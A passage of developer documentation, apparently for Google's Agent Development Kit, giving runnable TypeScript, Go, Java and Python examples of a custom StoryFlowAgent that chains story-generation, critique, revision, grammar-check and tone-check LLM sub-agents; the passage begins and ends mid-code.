USER_ID, sessionId: SESSION_ID, newMessage: createUserContent(`Generate a story about: ${userInputTopic}`) })) { if (isFinalResponse(event) && event.content?.parts?.length) { console.log(`Potential final response from [${event.author}]: ${event.content.parts.map(part => part.text ?? '').join('')}`); finalResponse = event.content.parts.map(part => part.text ?? '').join(''); } } const finalSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID }); console.log("\n--- Agent Interaction Result ---"); console.log("Agent Final Response: ", finalResponse); console.log("Final Session State:"); console.log(JSON.stringify(finalSession?.state, null, 2)); console.log("-------------------------------\n"); } // --- Run the Agent --- async function main() { const runner = await setupRunnerAndSession(); await callAgent(runner, "a lonely robot finding a friend in a junkyard"); } main(); ``` ```go // Instantiate the custom agent, which encapsulates the workflow agents. storyFlowAgent, err := NewStoryFlowAgent( storyGenerator, critic, reviser, grammarCheck, toneCheck, ) if err != nil { log.Fatalf("Failed to create story flow agent: %v", err) } // --- Run the Agent --- sessionService := session.InMemoryService() initialState := map[string]any{ "topic": "a brave kitten exploring a haunted house", } sessionInstance, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, State: initialState, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } userTopic := "a lonely robot finding a friend in a junkyard" r, err := runner.New(runner.Config{ AppName: appName, Agent: storyFlowAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } input := genai.NewContentFromText("Generate a story about: "+userTopic, genai.RoleUser) events := r.Run(ctx, userID, sessionInstance.Session.ID(), input, agent.RunConfig{ StreamingMode: agent.StreamingModeSSE, }) var finalResponse string for event, err := range events { if err != nil { log.Fatalf("An error occurred during agent execution: %v", err) } for _, part := range event.Content.Parts { // Accumulate text from all parts of the final response. finalResponse += part.Text } } fmt.Println("\n--- Agent Interaction Result ---") fmt.Println("Agent Final Response: " + finalResponse) finalSession, err := sessionService.Get(ctx, &session.GetRequest{ UserID: userID, AppName: appName, SessionID: sessionInstance.Session.ID(), }) if err != nil { log.Fatalf("Failed to retrieve final session: %v", err) } fmt.Println("Final Session State:", finalSession.Session.State()) } ``` ```java // --- Function to Interact with the Agent --- // Sends a new topic to the agent (overwriting the initial one if needed) // and runs the workflow. public static void runAgent(StoryFlowAgentExample agent, String userTopic) { // --- Setup Runner and Session --- InMemoryRunner runner = new InMemoryRunner(agent); Map initialState = new HashMap<>(); initialState.put("topic", "a brave kitten exploring a haunted house"); Session session = runner .sessionService() .createSession(APP_NAME, USER_ID, new ConcurrentHashMap<>(initialState), SESSION_ID) .blockingGet(); logger.log(Level.INFO, () -> String.format("Initial session state: %s", session.state())); session.state().put("topic", userTopic); // Update the state in the retrieved session logger.log(Level.INFO, () -> String.format("Updated session state topic to: %s", userTopic)); Content userMessage = Content.fromParts(Part.fromText("Generate a story about: " + userTopic)); // Use the modified session object for the run Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); final String[] finalResponse = {"No final response captured."}; eventStream.blockingForEach( event -> { if (event.finalResponse() && event.content().isPresent()) { String author = event.author() != null ? event.author() : "UNKNOWN_AUTHOR"; Optional textOpt = event .content() .flatMap(Content::parts) .filter(parts -> !parts.isEmpty()) .map(parts -> parts.get(0).text().orElse("")); logger.log(Level.INFO, () -> String.format("Potential final response from [%s]: %s", author, textOpt.orElse("N/A"))); textOpt.ifPresent(text -> finalResponse[0] = text); } }); System.out.println("\n--- Agent Interaction Result ---"); System.out.println("Agent Final Response: " + finalResponse[0]); // Retrieve session again to see the final state after the run Session finalSession = runner .sessionService() .getSession(APP_NAME, USER_ID, SESSION_ID, Optional.empty()) .blockingGet(); assert finalSession != null; System.out.println("Final Session State:" + finalSession.state()); System.out.println("-------------------------------\n"); } ``` *(Note: The full runnable code, including imports and execution logic, can be found linked below.)* ______________________________________________________________________ ## Full Code Example Storyflow Agent ```python # Full runnable code for the StoryFlowAgent example # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from typing import AsyncGenerator from typing_extensions import override from google.adk.agents import LlmAgent, BaseAgent, LoopAgent, SequentialAgent from google.adk.agents.invocation_context import InvocationContext from google.genai import types from google.adk.sessions import InMemorySessionService from google.adk.runners import Runner from google.adk.events import Event from pydantic import BaseModel, Field # --- Constants --- APP_NAME = "story_app" USER_ID = "12345" SESSION_ID = "123344" GEMINI_2_FLASH = "gemini-2.0-flash" # --- Configure Logging --- logging.basicConfig(level=logging.INFO) logger = logging.getLogger(__name__) # --- Custom Orchestrator Agent --- class StoryFlowAgent(BaseAgent): """ Custom agent for a story generation and refinement workflow. This agent orchestrates a sequence of LLM agents to generate a story, critique it, revise it, check grammar and tone, and potentially regenerate the story if the tone is negative. """ # --- Field Declarations for Pydantic --- # Declare the agents passed during initialization as class attributes with type hints story_generator: LlmAgent critic: LlmAgent reviser: LlmAgent grammar_check: LlmAgent tone_check: LlmAgent loop_agent: LoopAgent sequential_agent: SequentialAgent # model_config allows setting Pydantic configurations if needed, e.g., arbitrary_types_allowed model_config = {"arbitrary_types_allowed": True} def __init__( self, name: str, story_generator: LlmAgent, critic: LlmAgent, reviser: LlmAgent, grammar_check: LlmAgent, tone_check: LlmAgent, ): """ Initializes the StoryFlowAgent. Args: name: The name of the agent. story_generator: An LlmAgent to generate the initial story. critic: An LlmAgent to critique the story. reviser: An LlmAgent to revise the story based on criticism. grammar_check: An LlmAgent to check the grammar. tone_check: An LlmAgent to analyze the tone. """ # Create internal agents *before* calling super().__init__ loop_agent = LoopAgent( name="CriticReviserLoop", sub_agents=[critic, reviser], max_iterations=2 ) sequential_agent = SequentialAgent( name="PostProcessing", sub_agents=[grammar_check, tone_check] ) # Define the sub_agents list for the framework sub_agents_list = [ story_generator, loop_agent, sequential_agent, ] # Pydantic will validate and assign them based on the class annotations. super().__init__( name=name, story_generator=story_generator, critic=critic, reviser=reviser, grammar_check=grammar_check, tone_check=tone_check, loop_agent=loop_agent, sequential_agent=sequential_agent, sub_agents=sub_agents_list, # Pass the sub_agents list directly ) @override async def _run_async_impl( self, ctx: InvocationContext ) -> AsyncGenerator[Event, None]: """ Implements the custom orchestration logic for the story workflow. Uses the instance attributes assigned by Pydantic (e.g., self.story_generator). """ logger.info(f"[{self.name}] Starting story generation workflow.") # 1. Initial Story Generation logger.info(f"[{self.name}] Running StoryGenerator...") async for event in self.story_generator.run_async(ctx): logger.info(f"[{self.name}] Event from StoryGenerator: {event.model_dump_json(indent=2, exclude_none=True)}") yield event # Check if story was generated before proceeding if "current_story" not in ctx.session.state or not ctx.session.state["current_story"]: logger.error(f"[{self.name}] Failed to generate initial story. Aborting workflow.") return # Stop processing if initial story failed logger.info(f"[{self.name}] Story state after generator: {ctx.session.state.get('current_story')}") # 2. Critic-Reviser Loop logger.info(f"[{self.name}] Running CriticReviserLoop...") # Use the loop_agent instance attribute assigned during init async for event in self.loop_agent.run_async(ctx): logger.info(f"[{self.name}] Event from CriticReviserLoop: {event.model_dump_json(indent=2, exclude_none=True)}") yield event logger.info(f"[{self.name}] Story state after loop: {ctx.session.state.get('current_story')}") # 3. Sequential Post-Processing (Grammar and Tone Check) logger.info(f"[{self.name}] Running PostProcessing...") # Use the sequential_agent instance attribute assigned during init async for event in self.sequential_agent.run_async(ctx): logger.info(f"[{self.name}] Event from PostProcessing: {event.model_dump_json(indent=2, exclude_none=True)}") yield event # 4. Tone-Based Conditional Logic tone_check_result = ctx.session.state.get("tone_check_result") logger.info(f"[{self.name}] Tone check result: {tone_check_result}") if tone_check_result == "negative": logger.info(f"[{self.name}] Tone is negative. Regenerating story...") async for event in self.story_generator.run_async(ctx): logger.info(f"[{self.name}] Event from StoryGenerator (Regen): {event.model_dump_json(indent=2, exclude_none=True)}") yield event else: logger.info(f"[{self.name}] Tone is not negative. Keeping current story.") pass logger.info(f"[{self.name}] Workflow finished.") # --- Define the individual LLM agents --- story_generator = LlmAgent( name="StoryGenerator", model=GEMINI_2_FLASH, instruction="""You are a story writer. Write a short story (around 100 words), on the following topic: {topic}""", input_schema=None, output_key="current_story", # Key for storing output in session state ) critic = LlmAgent( name="Critic", model=GEMINI_2_FLASH, instruction="""You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.""", input_schema=None, output_key="criticism", # Key for storing criticism in session state ) reviser = LlmAgent( name="Reviser", model=GEMINI_2_FLASH, instruction="""You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.""", input_schema=None, output_key="current_story", # Overwrites the original story ) grammar_check = LlmAgent( name="GrammarCheck", model=GEMINI_2_FLASH, instruction="""You are a grammar checker. Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.""", input_schema=None, output_key="grammar_suggestions", ) tone_check = LlmAgent( name="ToneCheck", model=GEMINI_2_FLASH, instruction="""You are a tone analyzer. Analyze the tone of the story provided: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.""", input_schema=None, output_key="tone_check_result", # This agent's output determines the conditional flow ) # --- Create the custom agent instance --- story_flow_agent = StoryFlowAgent( name="StoryFlowAgent", story_generator=story_generator, critic=critic, reviser=reviser, grammar_check=grammar_check, tone_check=tone_check, ) INITIAL_STATE = {"topic": "a brave kitten exploring a haunted house"} # --- Setup Runner and Session --- async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID, state=INITIAL_STATE) logger.info(f"Initial session state: {session.state}") runner = Runner( agent=story_flow_agent, # Pass the custom orchestrator agent app_name=APP_NAME, session_service=session_service ) return session_service, runner # --- Function to Interact with the Agent --- async def call_agent_async(user_input_topic: str): """ Sends a new topic to the agent (overwriting the initial one if needed) and runs the workflow. """ session_service, runner = await setup_session_and_runner() current_session = session_service.sessions[APP_NAME][USER_ID][SESSION_ID] current_session.state["topic"] = user_input_topic logger.info(f"Updated session state topic to: {user_input_topic}") content = types.Content(role='user', parts=[types.Part(text=f"Generate a story about the preset topic.")]) events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) final_response = "No final response captured." async for event in events: if event.is_final_response() and event.content and event.content.parts: logger.info(f"Potential final response from [{event.author}]: {event.content.parts[0].text}") final_response = event.content.parts[0].text print("\n--- Agent Interaction Result ---") print("Agent Final Response: ", final_response) final_session = await session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) print("Final Session State:") import json print(json.dumps(final_session.state, indent=2)) print("-------------------------------\n") # --- Run the Agent --- # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("a lonely robot finding a friend in a junkyard") ``` ```typescript // Full runnable code for the StoryFlowAgent example /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, BaseAgent, LoopAgent, SequentialAgent, InMemoryRunner, InvocationContext, Event, isFinalResponse, } from '@google/adk'; import { createUserContent } from "@google/genai"; // --- Constants --- const APP_NAME = "story_app_ts"; const USER_ID = "12345"; const SESSION_ID = "123344_ts"; const GEMINI_MODEL = "gemini-2.5-flash"; // --- Custom Orchestrator Agent --- class StoryFlowAgent extends BaseAgent { // --- Property Declarations for TypeScript --- private storyGenerator: LlmAgent; private critic: LlmAgent; private reviser: LlmAgent; private grammarCheck: LlmAgent; private toneCheck: LlmAgent; private loopAgent: LoopAgent; private sequentialAgent: SequentialAgent; constructor( name: string, storyGenerator: LlmAgent, critic: LlmAgent, reviser: LlmAgent, grammarCheck: LlmAgent, toneCheck: LlmAgent ) { // Create internal composite agents const loopAgent = new LoopAgent({ name: "CriticReviserLoop", subAgents: [critic, reviser], maxIterations: 2, }); const sequentialAgent = new SequentialAgent({ name: "PostProcessing", subAgents: [grammarCheck, toneCheck], }); // Define the sub-agents for the framework to know about const subAgentsList = [ storyGenerator, loopAgent, sequentialAgent, ]; // Call the parent constructor super({ name, subAgents: subAgentsList, }); // Assign agents to class properties for use in the custom run logic this.storyGenerator = storyGenerator; this.critic = critic; this.reviser = reviser; this.grammarCheck = grammarCheck; this.toneCheck = toneCheck; this.loopAgent = loopAgent; this.sequentialAgent = sequentialAgent; } // Implements the custom orchestration logic for the story workflow. async* runLiveImpl(ctx: InvocationContext): AsyncGenerator { yield* this.runAsyncImpl(ctx); } // Implements the custom orchestration logic for the story workflow. async* runAsyncImpl(ctx: InvocationContext): AsyncGenerator { console.log(`[${this.name}] Starting story generation workflow.`); // 1. Initial Story Generation console.log(`[${this.name}] Running StoryGenerator...`); for await (const event of this.storyGenerator.runAsync(ctx)) { console.log(`[${this.name}] Event from StoryGenerator: ${JSON.stringify(event, null, 2)}`); yield event; } // Check if the story was generated before proceeding if (!ctx.session.state["current_story"]) { console.error(`[${this.name}] Failed to generate initial story. Aborting workflow.`); return; // Stop processing } console.log(`[${this.name}] Story state after generator: ${ctx.session.state['current_story']}`); // 2. Critic-Reviser Loop console.log(`[${this.name}] Running CriticReviserLoop...`); for await (const event of this.loopAgent.runAsync(ctx)) { console.log(`[${this.name}] Event from CriticReviserLoop: ${JSON.stringify(event, null, 2)}`); yield event; } console.log(`[${this.name}] Story state after loop: ${ctx.session.state['current_story']}`); // 3. Sequential Post-Processing (Grammar and Tone Check) console.log(`[${this.name}] Running PostProcessing...`); for await (const event of this.sequentialAgent.runAsync(ctx)) { console.log(`[${this.name}] Event from PostProcessing: ${JSON.stringify(event, null, 2)}`); yield event; } // 4. Tone-Based Conditional Logic const toneCheckResult = ctx.session.state["tone_check_result"] as string; console.log(`[${this.name}] Tone check result: ${toneCheckResult}`); if (toneCheckResult === "negative") { console.log(`[${this.name}] Tone is negative. Regenerating story...`); for await (const event of this.storyGenerator.runAsync(ctx)) { console.log(`[${this.name}] Event from StoryGenerator (Regen): ${JSON.stringify(event, null, 2)}`); yield event; } } else { console.log(`[${this.name}] Tone is not negative. Keeping current story.`); } console.log(`[${this.name}] Workflow finished.`); } } // --- Define the individual LLM agents --- const storyGenerator = new LlmAgent({ name: "StoryGenerator", model: GEMINI_MODEL, instruction: `You are a story writer. Write a short story (around 100 words), on the following topic: {topic}`, outputKey: "current_story", }); const critic = new LlmAgent({ name: "Critic", model: GEMINI_MODEL, instruction: `You are a story critic. Review the story provided: {{current_story}}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.`, outputKey: "criticism", }); const reviser = new LlmAgent({ name: "Reviser", model: GEMINI_MODEL, instruction: `You are a story reviser. Revise the story provided: {{current_story}}, based on the criticism in {{criticism}}. Output only the revised story.`, outputKey: "current_story", // Overwrites the original story }); const grammarCheck = new LlmAgent({ name: "GrammarCheck", model: GEMINI_MODEL, instruction: `You are a grammar checker. Check the grammar of the story provided: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.`, outputKey: "grammar_suggestions", }); const toneCheck = new LlmAgent({ name: "ToneCheck", model: GEMINI_MODEL, instruction: `You are a tone analyzer. Analyze the tone of the story provided: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.`, outputKey: "tone_check_result", }); // --- Create the custom agent instance --- const storyFlowAgent = new StoryFlowAgent( "StoryFlowAgent", storyGenerator, critic, reviser, grammarCheck, toneCheck ); const INITIAL_STATE = { "topic": "a brave kitten exploring a haunted house" }; // --- Setup Runner and Session --- async function setupRunnerAndSession() { const runner = new InMemoryRunner({ agent: storyFlowAgent, appName: APP_NAME, }); const session = await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID, state: INITIAL_STATE, }); console.log(`Initial session state: ${JSON.stringify(session.state, null, 2)}`); return runner; } // --- Function to Interact with the Agent --- async function callAgent(runner: InMemoryRunner, userInputTopic: string) { const currentSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID }); if (!currentSession) { return; } // Update the state with the new topic for this run currentSession.state["topic"] = userInputTopic; console.log(`Updated session state topic to: ${userInputTopic}`); let finalResponse = "No final response captured."; for await (const event of runner.runAsync({ userId: USER_ID, sessionId: SESSION_ID, newMessage: createUserContent(`Generate a story about: ${userInputTopic}`) })) { if (isFinalResponse(event) && event.content?.parts?.length) { console.log(`Potential final response from [${event.author}]: ${event.content.parts.map(part => part.text ?? '').join('')}`); finalResponse = event.content.parts.map(part => part.text ?? '').join(''); } } const finalSession = await runner.sessionService.getSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID }); console.log("\n--- Agent Interaction Result ---"); console.log("Agent Final Response: ", finalResponse); console.log("Final Session State:"); console.log(JSON.stringify(finalSession?.state, null, 2)); console.log("-------------------------------\n"); } // --- Run the Agent --- async function main() { const runner = await setupRunnerAndSession(); await callAgent(runner, "a lonely robot finding a friend in a junkyard"); } main(); ``` ```go # Full runnable code for the StoryFlowAgent example package main import ( "context" "fmt" "iter" "log" "google.golang.org/adk/agent/workflowagents/loopagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/genai" ) // StoryFlowAgent is a custom agent that orchestrates a story generation workflow. // It encapsulates the logic of running sub-agents in a specific sequence. type StoryFlowAgent struct { storyGenerator agent.Agent revisionLoopAgent agent.Agent postProcessorAgent agent.Agent } // NewStoryFlowAgent creates and configures the entire custom agent workflow. // It takes individual LLM agents as input and internally creates the necessary // workflow agents (loop, sequential), returning the final orchestrator agent. func NewStoryFlowAgent( storyGenerator, critic, reviser, grammarCheck, toneCheck agent.Agent, ) (agent.Agent, error) { loopAgent, err := loopagent.New(loopagent.Config{ MaxIterations: 2, AgentConfig: agent.Config{ Name: "CriticReviserLoop", SubAgents: []agent.Agent{critic, reviser}, }, }) if err != nil { return nil, fmt.Errorf("failed to create loop agent: %w", err) } sequentialAgent, err := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{ Name: "PostProcessing", SubAgents: []agent.Agent{grammarCheck, toneCheck}, }, }) if err != nil { return nil, fmt.Errorf("failed to create sequential agent: %w", err) } // The StoryFlowAgent struct holds the agents needed for the Run method. orchestrator := &StoryFlowAgent{ storyGenerator: storyGenerator, revisionLoopAgent: loopAgent, postProcessorAgent: sequentialAgent, } // agent.New creates the final agent, wiring up the Run method. return agent.New(agent.Config{ Name: "StoryFlowAgent", Description: "Orchestrates story generation, critique, revision, and checks.", SubAgents: []agent.Agent{storyGenerator, loopAgent, sequentialAgent}, Run: orchestrator.Run, }) } // Run defines the custom execution logic for the StoryFlowAgent. func (s *StoryFlowAgent) Run(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { // Stage 1: Initial Story Generation for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story generator failed: %w", err)) return } if !yield(event, nil) { return } } // Check if story was generated before proceeding currentStory, err := ctx.Session().State().Get("current_story") if err != nil || currentStory == "" { log.Println("Failed to generate initial story. Aborting workflow.") return } // Stage 2: Critic-Reviser Loop for event, err := range s.revisionLoopAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("loop agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 3: Post-Processing for event, err := range s.postProcessorAgent.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("sequential agent failed: %w", err)) return } if !yield(event, nil) { return } } // Stage 4: Conditional Regeneration toneResult, err := ctx.Session().State().Get("tone_check_result") if err != nil { log.Printf("Could not read tone_check_result from state: %v. Assuming tone is not negative.", err) return } if tone, ok := toneResult.(string); ok && tone == "negative" { log.Println("Tone is negative. Regenerating story...") for event, err := range s.storyGenerator.Run(ctx) { if err != nil { yield(nil, fmt.Errorf("story regeneration failed: %w", err)) return } if !yield(event, nil) { return } } } else { log.Println("Tone is not negative. Keeping current story.") } } } const ( modelName = "gemini-2.0-flash" appName = "story_app" userID = "user_12345" ) func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // --- Define the individual LLM agents --- storyGenerator, err := llmagent.New(llmagent.Config{ Name: "StoryGenerator", Model: model, Description: "Generates the initial story.", Instruction: "You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic}", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create StoryGenerator agent: %v", err) } critic, err := llmagent.New(llmagent.Config{ Name: "Critic", Model: model, Description: "Critiques the story.", Instruction: "You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character.", OutputKey: "criticism", }) if err != nil { log.Fatalf("Failed to create Critic agent: %v", err) } reviser, err := llmagent.New(llmagent.Config{ Name: "Reviser", Model: model, Description: "Revises the story based on criticism.", Instruction: "You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story.", OutputKey: "current_story", }) if err != nil { log.Fatalf("Failed to create Reviser agent: %v", err) } grammarCheck, err := llmagent.New(llmagent.Config{ Name: "GrammarCheck", Model: model, Description: "Checks grammar and suggests corrections.", Instruction: "You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors.", OutputKey: "grammar_suggestions", }) if err != nil { log.Fatalf("Failed to create GrammarCheck agent: %v", err) } toneCheck, err := llmagent.New(llmagent.Config{ Name: "ToneCheck", Model: model, Description: "Analyzes the tone of the story.", Instruction: "You are a tone analyzer. Analyze the tone of the story: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise.", OutputKey: "tone_check_result", }) if err != nil { log.Fatalf("Failed to create ToneCheck agent: %v", err) } // Instantiate the custom agent, which encapsulates the workflow agents. storyFlowAgent, err := NewStoryFlowAgent( storyGenerator, critic, reviser, grammarCheck, toneCheck, ) if err != nil { log.Fatalf("Failed to create story flow agent: %v", err) } // --- Run the Agent --- sessionService := session.InMemoryService() initialState := map[string]any{ "topic": "a brave kitten exploring a haunted house", } sessionInstance, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, State: initialState, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } userTopic := "a lonely robot finding a friend in a junkyard" r, err := runner.New(runner.Config{ AppName: appName, Agent: storyFlowAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } input := genai.NewContentFromText("Generate a story about: "+userTopic, genai.RoleUser) events := r.Run(ctx, userID, sessionInstance.Session.ID(), input, agent.RunConfig{ StreamingMode: agent.StreamingModeSSE, }) var finalResponse string for event, err := range events { if err != nil { log.Fatalf("An error occurred during agent execution: %v", err) } for _, part := range event.Content.Parts { // Accumulate text from all parts of the final response. finalResponse += part.Text } } fmt.Println("\n--- Agent Interaction Result ---") fmt.Println("Agent Final Response: " + finalResponse) finalSession, err := sessionService.Get(ctx, &session.GetRequest{ UserID: userID, AppName: appName, SessionID: sessionInstance.Session.ID(), }) if err != nil { log.Fatalf("Failed to retrieve final session: %v", err) } fmt.Println("Final Session State:", finalSession.Session.State()) } ``` ```java # Full runnable code for the StoryFlowAgent example import com.google.adk.agents.LlmAgent; import com.google.adk.agents.BaseAgent; import com.google.adk.agents.InvocationContext; import com.google.adk.agents.LoopAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.logging.Level; import java.util.logging.Logger; public class StoryFlowAgentExample extends BaseAgent { // --- Constants --- private static final String APP_NAME = "story_app"; private static final String USER_ID = "user_12345"; private static final String SESSION_ID = "session_123344"; private static final String MODEL_NAME = "gemini-2.0-flash"; // Ensure this model is available private static final Logger logger = Logger.getLogger(StoryFlowAgentExample.class.getName()); private final LlmAgent storyGenerator; private final LoopAgent loopAgent; private final SequentialAgent sequentialAgent; public StoryFlowAgentExample( String name, LlmAgent storyGenerator, LoopAgent loopAgent, SequentialAgent sequentialAgent) { super( name, "Orchestrates story generation, critique, revision, and checks.", List.of(storyGenerator, loopAgent, sequentialAgent), null, null); this.storyGenerator = storyGenerator; this.loopAgent = loopAgent; this.sequentialAgent = sequentialAgent; } public static void main(String[] args) { // --- Define the individual LLM agents --- LlmAgent storyGenerator = LlmAgent.builder() .name("StoryGenerator") .model(MODEL_NAME) .description("Generates the initial story.") .instruction( """ You are a story writer. Write a short story (around 100 words) about a cat, based on the topic: {topic} """) .inputSchema(null) .outputKey("current_story") // Key for storing output in session state .build(); LlmAgent critic = LlmAgent.builder() .name("Critic") .model(MODEL_NAME) .description("Critiques the story.") .instruction( """ You are a story critic. Review the story: {current_story}. Provide 1-2 sentences of constructive criticism on how to improve it. Focus on plot or character. """) .inputSchema(null) .outputKey("criticism") // Key for storing criticism in session state .build(); LlmAgent reviser = LlmAgent.builder() .name("Reviser") .model(MODEL_NAME) .description("Revises the story based on criticism.") .instruction( """ You are a story reviser. Revise the story: {current_story}, based on the criticism: {criticism}. Output only the revised story. """) .inputSchema(null) .outputKey("current_story") // Overwrites the original story .build(); LlmAgent grammarCheck = LlmAgent.builder() .name("GrammarCheck") .model(MODEL_NAME) .description("Checks grammar and suggests corrections.") .instruction( """ You are a grammar checker. Check the grammar of the story: {current_story}. Output only the suggested corrections as a list, or output 'Grammar is good!' if there are no errors. """) .outputKey("grammar_suggestions") .build(); LlmAgent toneCheck = LlmAgent.builder() .name("ToneCheck") .model(MODEL_NAME) .description("Analyzes the tone of the story.") .instruction( """ You are a tone analyzer. Analyze the tone of the story: {current_story}. Output only one word: 'positive' if the tone is generally positive, 'negative' if the tone is generally negative, or 'neutral' otherwise. """) .outputKey("tone_check_result") // This agent's output determines the conditional flow .build(); LoopAgent loopAgent = LoopAgent.builder() .name("CriticReviserLoop") .description("Iteratively critiques and revises the story.") .subAgents(critic, reviser) .maxIterations(2) .build(); SequentialAgent sequentialAgent = SequentialAgent.builder() .name("PostProcessing") .description("Performs grammar and tone checks sequentially.") .subAgents(grammarCheck, toneCheck) .build(); StoryFlowAgentExample storyFlowAgentExample = new StoryFlowAgentExample(APP_NAME, storyGenerator, loopAgent, sequentialAgent); // --- Run the Agent --- runAgent(storyFlowAgentExample, "a lonely robot finding a friend in a junkyard"); } // --- Function to Interact with the Agent --- // Sends a new topic to the agent (overwriting the initial one if needed) // and runs the workflow. public static void runAgent(StoryFlowAgentExample agent, String userTopic) { // --- Setup Runner and Session --- InMemoryRunner runner = new InMemoryRunner(agent); Map initialState = new HashMap<>(); initialState.put("topic", "a brave kitten exploring a haunted house"); Session session = runner .sessionService() .createSession(APP_NAME, USER_ID, new ConcurrentHashMap<>(initialState), SESSION_ID) .blockingGet(); logger.log(Level.INFO, () -> String.format("Initial session state: %s", session.state())); session.state().put("topic", userTopic); // Update the state in the retrieved session logger.log(Level.INFO, () -> String.format("Updated session state topic to: %s", userTopic)); Content userMessage = Content.fromParts(Part.fromText("Generate a story about: " + userTopic)); // Use the modified session object for the run Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); final String[] finalResponse = {"No final response captured."}; eventStream.blockingForEach( event -> { if (event.finalResponse() && event.content().isPresent()) { String author = event.author() != null ? event.author() : "UNKNOWN_AUTHOR"; Optional textOpt = event .content() .flatMap(Content::parts) .filter(parts -> !parts.isEmpty()) .map(parts -> parts.get(0).text().orElse("")); logger.log(Level.INFO, () -> String.format("Potential final response from [%s]: %s", author, textOpt.orElse("N/A"))); textOpt.ifPresent(text -> finalResponse[0] = text); } }); System.out.println("\n--- Agent Interaction Result ---"); System.out.println("Agent Final Response: " + finalResponse[0]); // Retrieve session again to see the final state after the run Session finalSession = runner .sessionService() .getSession(APP_NAME, USER_ID, SESSION_ID, Optional.empty()) .blockingGet(); assert finalSession != null; System.out.println("Final Session State:" + finalSession.state()); System.out.println("-------------------------------\n"); } private boolean isStoryGenerated(InvocationContext ctx) { Object currentStoryObj = ctx.session().state().get("current_story"); return currentStoryObj != null && !String.valueOf(currentStoryObj).isEmpty(); } @Override protected Flowable runAsyncImpl(InvocationContext invocationContext) { // Implements the custom orchestration logic for the story workflow. // Uses the instance attributes assigned by Pydantic (e.g., self.story_generator). logger.log(Level.INFO, () -> String.format("[%s] Starting story generation workflow.", name())); // Stage 1. Initial Story Generation Flowable storyGenFlow = runStage(storyGenerator, invocationContext, "StoryGenerator"); // Stage 2: Critic-Reviser Loop (runs after story generation completes) Flowable criticReviserFlow = Flowable.defer(() -> { if (!isStoryGenerated(invocationContext)) { logger.log(Level.SEVERE,() -> String.format("[%s] Failed to generate initial story. Aborting after StoryGenerator.", name())); return Flowable.empty(); // Stop further processing if no story } logger.log(Level.INFO, () -> String.format("[%s] Story state after generator: %s", name(), invocationContext.session().state().get("current_story"))); return runStage(loopAgent, invocationContext, "CriticReviserLoop"); }); // Stage 